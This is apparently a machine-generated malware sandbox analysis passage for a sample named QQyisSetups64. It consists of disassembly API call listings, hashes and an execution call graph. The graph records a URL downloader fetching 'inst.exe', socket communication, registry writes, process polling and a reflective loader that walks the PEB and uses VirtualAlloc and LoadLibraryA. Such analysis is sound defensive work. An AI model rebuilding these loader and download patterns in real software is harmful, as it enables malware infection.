                                                                                                                                                                                                                      • Opcode ID: 16030182e63fd1f010b90ae5e0ea2653d859c965618dbfa5d57fb4f63939e87b
                                                                                                                                                                                                                      • Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16030182e63fd1f010b90ae5e0ea2653d859c965618dbfa5d57fb4f63939e87b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
                                                                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
                                                                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
                                                                                                                                                                                                                      • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3089488326-0
                                                                                                                                                                                                                      • Opcode ID: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                                      • Instruction ID: e6559f61c40ac0d619c819a68eafb266e25295ce9371c656e40cb26db6e47210
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0FF70900108EFCB08DF98CE9599DB7B6FF48301B20819EE406A3352CB31AF50EB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 028705F4
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 028705FB
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 02870610
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 02870625
                                                                                                                                                                                                                        • Part of subcall function 02861147: LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                                                                        • Part of subcall function 02861147: GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                                                                        • Part of subcall function 02861147: RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                                                                        • Part of subcall function 02861147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 487361192-0
                                                                                                                                                                                                                      • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                                      • Instruction ID: 88f0037c1de4a8ddbfcfeb8c9d98e3c9592c6855352256938697fb6879bba5e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12E002B53C4354BAF261B7E45C8FF593655AB09F42F608650F349BD0E1CAF4A450CA2E
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 028713D2
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 028713E1
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 028713EA
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 028713F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                      • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                                      • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
                                                                                                                                                                                                                      • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                      • API String ID: 2188046178-4119554291
                                                                                                                                                                                                                      • Opcode ID: 08c39add87df28b0c646ee86c8b215fd390414fc50b3e429ccc81f143b5529b7
                                                                                                                                                                                                                      • Instruction ID: e9e11cb9fd6853f183fefa1d41d0e0024c16e6e010e8b744e496187a2de98be2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08c39add87df28b0c646ee86c8b215fd390414fc50b3e429ccc81f143b5529b7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE51467480424CEFEB14CBA4CC91BEEBBB5EF54340F148199E11977296DB302A49CBA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001077C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                                                                      • API String ID: 17069307-1891997712
                                                                                                                                                                                                                      • Opcode ID: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                                                                      • Instruction ID: 8654295f68b371237154e9a797b482e4a7d7525e36026ba3eb3070c176022b3d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F0A734A04211DBD321DF14C844A65B7B4FB49770F10432EF9A98B2E1D774E8C2CE51

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:0.3%
                                                                                                                                                                                                                      Total number of Nodes:611
                                                                                                                                                                                                                      Total number of Limit Nodes:22
                                                                                                                                                                                                                      execution_graph 48285 2c8608a 48286 2c860a0 RegOpenKeyExW 48285->48286 48287 2c83f35 __wcsrev 48286->48287 48288 2c8638b 48291 2c81100 48288->48291 48290 2c86390 48292 2c8110b 48291->48292 48293 2c81111 48291->48293 48292->48290 48299 2c86ba0 48293->48299 48295 2c81134 VirtualAlloc 48296 2c8116f 48295->48296 48297 2c81198 48296->48297 48298 2c8118a VirtualFree 48296->48298 48297->48290 48298->48297 48300 2c86bad 48299->48300 48304 2c87d77 __ctrlfp __floor_pentium4 48299->48304 48301 2c86bde 48300->48301 48300->48304 48308 2c86c28 48301->48308 48310 2c87a9b 67 API calls __cftof_l 48301->48310 48302 2c87de5 __floor_pentium4 48303 2c87dd2 __ctrlfp 48302->48303 48312 2c8bc80 67 API calls 6 library calls 48302->48312 48303->48295 48304->48302 48304->48303 48307 2c87dc2 48304->48307 48311 2c8bc2b 66 API calls 3 library calls 48307->48311 48308->48295 48310->48308 48311->48303 48312->48303 48313 2c8474c lstrlenW 48314 2c9fff8 48313->48314 48315 2c832e0 6 API calls 48316 2c82d80 ResetEvent InterlockedExchange timeGetTime socket 48317 2c82de8 48316->48317 48318 2c82dfc lstrlenW WideCharToMultiByte 48316->48318 48370 2c86815 48317->48370 48337 2c867ff 48318->48337 48322 2c82df6 48323 2c82e59 ctype 48324 2c82e60 htons connect 48323->48324 48325 2c82e96 48323->48325 48324->48325 48326 2c82eab setsockopt setsockopt setsockopt setsockopt 48324->48326 48327 2c86815 __cftof_l 5 API calls 48325->48327 48329 2c82f52 InterlockedExchange 48326->48329 48330 2c82f24 WSAIoctl 48326->48330 48328 2c82ea5 48327->48328 48349 2c8721b 48329->48349 48330->48329 48333 2c8721b 755 API calls 48334 2c82f91 48333->48334 48335 2c86815 __cftof_l 5 API calls 48334->48335 48336 2c82fa6 48335->48336 48339 2c86f17 48337->48339 48340 2c82e22 lstrlenW WideCharToMultiByte gethostbyname 48339->48340 48344 2c86f3d std::exception::exception 48339->48344 48378 2c86e83 48339->48378 48395 2c88550 DecodePointer 48339->48395 48340->48323 48342 2c86f7b 48397 2c86e24 66 API calls std::exception::operator= 48342->48397 48344->48342 48396 2c873e9 76 API calls __cinit 48344->48396 48345 2c86f85 48398 2c87836 RaiseException 48345->48398 48348 2c86f96 48350 2c8722b 48349->48350 48351 2c8723f 48349->48351 48434 2c8710d 66 API calls __getptd_noexit 48350->48434 48407 2c89754 TlsGetValue 48351->48407 48354 2c87230 48435 2c88702 11 API calls __cftof_l 48354->48435 48359 2c872a2 48436 2c86e49 66 API calls 2 library calls 48359->48436 48363 2c872a8 48365 2c82f79 48363->48365 48437 2c87133 66 API calls 2 library calls 48363->48437 48365->48333 48366 2c87267 CreateThread 48366->48365 48369 2c8729a GetLastError 48366->48369 48495 2c871b6 48366->48495 48369->48359 48371 2c8681d 48370->48371 48372 2c8681f IsDebuggerPresent 48370->48372 48371->48322 48860 2c8b5e6 48372->48860 48375 2c8794f SetUnhandledExceptionFilter UnhandledExceptionFilter 48376 2c8796c __call_reportfault 48375->48376 48377 2c87974 GetCurrentProcess TerminateProcess 48375->48377 48376->48377 48377->48322 48379 2c86f00 48378->48379 48384 2c86e91 48378->48384 48405 2c88550 DecodePointer 48379->48405 48381 2c86e9c 48381->48384 48399 2c88508 66 API calls 2 library calls 48381->48399 48400 2c88359 66 API calls 7 library calls 48381->48400 48401 2c88098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 48381->48401 48382 2c86f06 48406 2c8710d 66 API calls __getptd_noexit 48382->48406 48384->48381 48386 2c86ebf RtlAllocateHeap 48384->48386 48389 2c86eec 48384->48389 48393 2c86eea 48384->48393 48402 2c88550 DecodePointer 48384->48402 48386->48384 48387 2c86ef8 48386->48387 48387->48339 48403 2c8710d 66 API calls __getptd_noexit 48389->48403 48404 2c8710d 66 API calls __getptd_noexit 48393->48404 48395->48339 48396->48342 48397->48345 48398->48348 48399->48381 48400->48381 48402->48384 48403->48393 48404->48387 48405->48382 48406->48387 48408 2c89769 DecodePointer TlsSetValue 48407->48408 48409 2c87245 48407->48409 48408->48409 48410 2c89fe4 48409->48410 48413 2c89fed 48410->48413 48412 2c87251 48412->48359 48416 2c8990f 48412->48416 48413->48412 48414 2c8a00b Sleep 48413->48414 48438 2c8e555 48413->48438 48415 2c8a020 48414->48415 48415->48412 48415->48413 48449 2c89896 GetLastError 48416->48449 48418 2c89917 48419 2c8725e 48418->48419 48463 2c88315 66 API calls 3 library calls 48418->48463 48421 2c897e2 48419->48421 48465 2c89db0 48421->48465 48423 2c897ee GetModuleHandleW 48466 2c8c144 48423->48466 48425 2c8982c InterlockedIncrement 48473 2c89884 48425->48473 48428 2c8c144 __lock 64 API calls 48429 2c8984d 48428->48429 48476 2c8de7f InterlockedIncrement 48429->48476 48431 2c8986b 48488 2c8988d 48431->48488 48433 2c89878 __fcloseall 48433->48366 48434->48354 48435->48365 48436->48363 48437->48365 48439 2c8e561 48438->48439 48445 2c8e57c 48438->48445 48440 2c8e56d 48439->48440 48439->48445 48447 2c8710d 66 API calls __getptd_noexit 48440->48447 48442 2c8e58f HeapAlloc 48442->48445 48446 2c8e5b6 48442->48446 48443 2c8e572 48443->48413 48445->48442 48445->48446 48448 2c88550 DecodePointer 48445->48448 48446->48413 48447->48443 48448->48445 48450 2c89754 ___set_flsgetvalue 3 API calls 48449->48450 48451 2c898ad 48450->48451 48452 2c89903 SetLastError 48451->48452 48453 2c89fe4 __calloc_crt 62 API calls 48451->48453 48452->48418 48454 2c898c1 48453->48454 48454->48452 48455 2c898c9 DecodePointer 48454->48455 48456 2c898de 48455->48456 48457 2c898fa 48456->48457 48458 2c898e2 48456->48458 48464 2c86e49 66 API calls 2 library calls 48457->48464 48459 2c897e2 __CRT_INIT@12 62 API calls 48458->48459 48461 2c898ea GetCurrentThreadId 48459->48461 48461->48452 48462 2c89900 48462->48452 48464->48462 48465->48423 48467 2c8c159 48466->48467 48468 2c8c16c EnterCriticalSection 48466->48468 48491 2c8c082 66 API calls 9 library calls 48467->48491 48468->48425 48470 2c8c15f 48470->48468 48492 2c88315 66 API calls 3 library calls 48470->48492 48493 2c8c06b LeaveCriticalSection 48473->48493 48475 2c89846 48475->48428 48477 2c8de9d InterlockedIncrement 48476->48477 48478 2c8dea0 48476->48478 48477->48478 48479 2c8deaa InterlockedIncrement 48478->48479 48480 2c8dead 48478->48480 48479->48480 48481 2c8deba 48480->48481 48482 2c8deb7 InterlockedIncrement 48480->48482 48483 2c8dec4 InterlockedIncrement 48481->48483 48484 2c8dec7 48481->48484 48482->48481 48483->48484 48485 2c8dee0 InterlockedIncrement 48484->48485 48486 2c8defb InterlockedIncrement 48484->48486 48487 2c8def0 InterlockedIncrement 48484->48487 48485->48484 48486->48431 48487->48484 48494 2c8c06b LeaveCriticalSection 48488->48494 48490 2c89894 48490->48433 48491->48470 48493->48475 48494->48490 48496 2c89754 ___set_flsgetvalue 3 API calls 48495->48496 48497 2c871c1 48496->48497 48510 2c89734 TlsGetValue 48497->48510 48500 2c871fa 48512 2c89929 48500->48512 48501 2c871d0 48561 2c89788 DecodePointer 48501->48561 48503 2c87215 48548 2c87175 48503->48548 48507 2c871df 48508 2c871f0 GetCurrentThreadId 48507->48508 48509 2c871e3 GetLastError ExitThread 48507->48509 48508->48503 48511 2c871cc 48510->48511 48511->48500 48511->48501 48514 2c89935 __fcloseall 48512->48514 48513 2c8994d 48515 2c8995b 48513->48515 48563 2c86e49 66 API calls 2 library calls 48513->48563 48514->48513 48516 2c89a37 __fcloseall 48514->48516 48562 2c86e49 66 API calls 2 library calls 48514->48562 48519 2c89969 48515->48519 48564 2c86e49 66 API calls 2 library calls 48515->48564 48516->48503 48521 2c89977 48519->48521 48565 2c86e49 66 API calls 2 library calls 48519->48565 48523 2c89985 48521->48523 48566 2c86e49 66 API calls 2 library calls 48521->48566 48524 2c89993 48523->48524 48567 2c86e49 66 API calls 2 library calls 48523->48567 48527 2c899a1 48524->48527 48568 2c86e49 66 API calls 2 library calls 48524->48568 48529 2c899b2 48527->48529 48569 2c86e49 66 API calls 2 library calls 48527->48569 48531 2c8c144 __lock 66 API calls 48529->48531 48532 2c899ba 48531->48532 48533 2c899c6 InterlockedDecrement 48532->48533 48539 2c899df 48532->48539 48534 2c899d1 48533->48534 48533->48539 48534->48539 48570 2c86e49 66 API calls 2 library calls 48534->48570 48536 2c899ec 48538 2c8c144 __lock 66 API calls 48536->48538 48540 2c899f3 48538->48540 48571 2c89a43 LeaveCriticalSection _doexit 48539->48571 48541 2c89a24 48540->48541 48572 2c8df0e 8 API calls 48540->48572 48574 2c89a4f LeaveCriticalSection _doexit 48541->48574 48544 2c89a31 48575 2c86e49 66 API calls 2 library calls 48544->48575 48546 2c89a08 48546->48541 48573 2c8dfa7 66 API calls 4 library calls 48546->48573 48549 2c87181 __fcloseall 48548->48549 48550 2c8990f __getptd 66 API calls 48549->48550 48551 2c87186 48550->48551 48576 2c82fb0 48551->48576 48586 2c830c0 48551->48586 48591 2c852d9 48551->48591 48602 2c852b0 48551->48602 48552 2c87190 48613 2c87156 48552->48613 48554 2c87196 48555 2c89c41 __XcptFilter 66 API calls 48554->48555 48556 2c871a7 48555->48556 48561->48507 48562->48513 48563->48515 48564->48519 48565->48521 48566->48523 48567->48524 48568->48527 48569->48529 48570->48539 48571->48536 48572->48546 48573->48541 48574->48544 48575->48516 48577 2c867ff 77 API calls 48576->48577 48584 2c82fd3 48577->48584 48578 2c83014 select 48579 2c8306d 48578->48579 48578->48584 48580 2c86815 __cftof_l 5 API calls 48579->48580 48582 2c83098 48580->48582 48581 2c83032 recv 48581->48584 48582->48552 48584->48578 48584->48579 48584->48581 48585 2c8710d 66 API calls __cftof_l 48584->48585 48619 2c83350 48584->48619 48585->48584 48587 2c83128 48586->48587 48588 2c830d4 48586->48588 48587->48552 48588->48587 48589 2c830e8 Sleep 48588->48589 48590 2c83104 timeGetTime 48588->48590 48589->48588 48590->48588 48593 2c852d2 48591->48593 48592 2c8536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 48594 2c8543c 48592->48594 48599 2c853ca 48592->48599 48593->48592 48679 3600497 48594->48679 48597 2c85403 OpenProcess 48598 2c85415 GetExitCodeProcess 48597->48598 48597->48599 48598->48599 48599->48597 48600 2c8542f Sleep 48599->48600 48684 2c85820 105 API calls 2 library calls 48599->48684 48600->48597 48603 2c8536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 48602->48603 48608 2c852cc 48602->48608 48604 2c853ca 48603->48604 48605 2c8543c 48603->48605 48609 2c85403 OpenProcess 48604->48609 48611 2c8542f Sleep 48604->48611 48858 2c85820 105 API calls 2 library calls 48604->48858 48612 3600497 583 API calls 48605->48612 48607 2c85442 48607->48552 48608->48603 48609->48604 48610 2c85415 GetExitCodeProcess 48609->48610 48610->48604 48611->48609 48612->48607 48614 2c89896 __getptd_noexit 66 API calls 48613->48614 48616 2c87160 48614->48616 48615 2c8716b ExitThread 48616->48615 48859 2c89a58 79 API calls __freefls@4 48616->48859 48618 2c8716a 48618->48615 48620 2c83366 48619->48620 48621 2c81100 70 API calls 48620->48621 48628 2c83378 _memmove 48621->48628 48622 2c834e1 48622->48584 48623 2c834c6 48624 2c811b0 70 API calls 48623->48624 48625 2c834d8 48624->48625 48625->48584 48626 2c83403 timeGetTime 48631 2c811b0 48626->48631 48628->48622 48628->48623 48628->48626 48629 2c811b0 70 API calls 48628->48629 48640 2c854c0 48628->48640 48629->48628 48632 2c811bd 48631->48632 48633 2c811c6 48632->48633 48634 2c86ba0 __floor_pentium4 68 API calls 48632->48634 48633->48628 48635 2c811ee 48634->48635 48636 2c8121b VirtualAlloc 48635->48636 48637 2c81214 48635->48637 48638 2c81236 48636->48638 48637->48628 48639 2c81247 VirtualFree 48638->48639 48639->48628 48641 2c854dc 48640->48641 48665 2c8580d 48640->48665 48642 2c85707 VirtualAlloc 48641->48642 48643 2c854e7 RegOpenKeyExW 48641->48643 48644 2c85745 48642->48644 48645 2c855ba 48643->48645 48646 2c85515 RegQueryValueExW 48643->48646 48649 2c867ff 77 API calls 48644->48649 48652 2c856f8 48645->48652 48654 2c855f5 48645->48654 48647 2c8553a 48646->48647 48648 2c855ad RegCloseKey 48646->48648 48650 2c867ff 77 API calls 48647->48650 48648->48645 48653 2c85758 48649->48653 48651 2c85540 _memset 48650->48651 48656 2c8554d RegQueryValueExW 48651->48656 48658 2c8721b 743 API calls 48652->48658 48653->48652 48657 2c85788 RegCreateKeyW 48653->48657 48655 2c855fe VirtualFree 48654->48655 48666 2c85611 _memset 48654->48666 48655->48666 48659 2c85569 VirtualAlloc 48656->48659 48660 2c855aa 48656->48660 48662 2c857ca RegCloseKey 48657->48662 48663 2c857a3 RegDeleteValueW RegSetValueExW 48657->48663 48664 2c857f3 Sleep 48658->48664 48661 2c855a5 48659->48661 48660->48648 48661->48660 48662->48652 48663->48662 48676 2c82d10 48664->48676 48665->48628 48667 2c867ff 77 API calls 48666->48667 48669 2c856b1 48667->48669 48668 2c856e6 ctype 48668->48628 48669->48668 48672 2c860df 48669->48672 48673 2c860e5 48672->48673 48674 2c811b0 70 API calls 48673->48674 48675 2c9fab1 GetCurrentThreadId 48674->48675 48677 2c82d70 48676->48677 48678 2c82d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 48676->48678 48677->48665 48678->48677 48685 36000cd GetPEB 48679->48685 48681 36004a8 48683 2c85442 48681->48683 48687 36001cb 48681->48687 48683->48552 48684->48599 48686 36000e5 48685->48686 48686->48681 48688 36001e6 48687->48688 48693 36001df 48687->48693 48689 360021e VirtualAlloc 48688->48689 48688->48693 48692 3600238 48689->48692 48689->48693 48690 3600330 LoadLibraryA 48690->48692 48690->48693 48691 36003a3 48691->48693 48695 37911f2 48691->48695 48692->48690 48692->48691 48693->48683 48696 37911fd 48695->48696 48697 3791202 48695->48697 48713 3798262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 48696->48713 48701 37910fc 48697->48701 48700 3791210 48700->48693 48703 3791108 ___BuildCatchObject 48701->48703 48702 3791155 48711 37911a5 ___BuildCatchObject 48702->48711 48766 378e480 48702->48766 48703->48702 48703->48711 48714 3790f98 48703->48714 48707 3791185 48709 3790f98 __CRT_INIT@12 149 API calls 48707->48709 48707->48711 48708 378e480 ___DllMainCRTStartup 526 API calls 48710 379117c 48708->48710 48709->48711 48712 3790f98 __CRT_INIT@12 149 API calls 48710->48712 48711->48700 48712->48707 48713->48697 48715 3790fa4 ___BuildCatchObject 48714->48715 48716 3790fac 48715->48716 48717 3791026 48715->48717 48770 3791a1b HeapCreate 48716->48770 48719 379102c 48717->48719 48720 3791087 48717->48720 48726 379104a 48719->48726 48730 3790fb5 ___BuildCatchObject 48719->48730 48780 3791ce6 66 API calls _doexit 48719->48780 48721 379108c 48720->48721 48722 37910e5 48720->48722 48785 3793ca0 TlsGetValue 48721->48785 48722->48730 48813 3793fa6 79 API calls __freefls@4 48722->48813 48723 3790fb1 48725 3790fbc 48723->48725 48723->48730 48771 3794014 86 API calls 4 library calls 48725->48771 48732 379105e 48726->48732 48781 3797dfb 67 API calls _free 48726->48781 48730->48702 48784 3791071 70 API calls __mtterm 48732->48784 48737 3790fc1 __RTC_Initialize 48738 3790fc5 48737->48738 48744 3790fd1 GetCommandLineA 48737->48744 48772 3791a39 HeapDestroy 48738->48772 48739 3791054 48782 3793cf1 70 API calls _free 48739->48782 48740 37910a9 DecodePointer 48747 37910be 48740->48747 48743 3791059 48783 3791a39 HeapDestroy 48743->48783 48773 379817f 71 API calls 2 library calls 48744->48773 48749 37910d9 48747->48749 48750 37910c2 48747->48750 48748 3790fe1 48774 3797bb6 73 API calls __calloc_crt 48748->48774 48807 378f639 48749->48807 48794 3793d2e 48750->48794 48754 37910c9 GetCurrentThreadId 48754->48730 48755 3790feb 48756 3790fef 48755->48756 48776 37980c4 95 API calls 3 library calls 48755->48776 48775 3793cf1 70 API calls _free 48756->48775 48759 3790ffb 48760 379100f 48759->48760 48777 3797e4e 94 API calls 6 library calls 48759->48777 48765 3790fca 48760->48765 48779 3797dfb 67 API calls _free 48760->48779 48763 3791004 48763->48760 48778 3791af9 77 API calls 4 library calls 48763->48778 48765->48730 48767 378e489 48766->48767 48768 378e4af 48766->48768 48767->48768 48769 378e491 CreateThread WaitForSingleObject 48767->48769 48768->48707 48768->48708 48769->48768 48814 378df10 48769->48814 48770->48723 48771->48737 48772->48765 48773->48748 48774->48755 48775->48738 48776->48759 48777->48763 48778->48760 48779->48756 48780->48726 48781->48739 48782->48743 48783->48732 48784->48730 48786 3791091 48785->48786 48787 3793cb5 DecodePointer TlsSetValue 48785->48787 48788 3794534 48786->48788 48787->48786 48791 379453d 48788->48791 48789 379a6f2 __calloc_crt 65 API calls 48789->48791 48790 379109d 48790->48730 48790->48740 48791->48789 48791->48790 48792 379455b Sleep 48791->48792 48793 3794570 48792->48793 48793->48790 48793->48791 48795 3794300 ___BuildCatchObject 48794->48795 48796 3793d3a GetModuleHandleW 48795->48796 48797 3798e5b __lock 64 API calls 48796->48797 48798 3793d78 InterlockedIncrement 48797->48798 48799 3793dd0 __CRT_INIT@12 LeaveCriticalSection 48798->48799 48800 3793d92 48799->48800 48801 3798e5b __lock 64 API calls 48800->48801 48802 3793d99 48801->48802 48803 3794d46 ___addlocaleref 8 API calls 48802->48803 48804 3793db7 48803->48804 48805 3793dd9 __CRT_INIT@12 LeaveCriticalSection 48804->48805 48806 3793dc4 ___BuildCatchObject 48805->48806 48806->48754 48808 378f66d __dosmaperr 48807->48808 48809 378f644 RtlFreeHeap 48807->48809 48808->48730 48809->48808 48810 378f659 48809->48810 48811 378f91b _bsearch 64 API calls 48810->48811 48812 378f65f GetLastError 48811->48812 48812->48808 48813->48730 48815 3790542 67 API calls 48814->48815 48816 378df5a Sleep 48815->48816 48817 378df74 48816->48817 48818 378df97 48816->48818 48821 378f707 77 API calls 48817->48821 48819 378df9f 48818->48819 48820 378dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 48818->48820 48822 3787620 14 API calls 48819->48822 48823 378fa29 289 API calls 48820->48823 48824 378df7b 48821->48824 48822->48820 48825 378e003 CloseHandle 48823->48825 48826 378fa29 289 API calls 48824->48826 48828 378f707 77 API calls 48825->48828 48827 378df8d 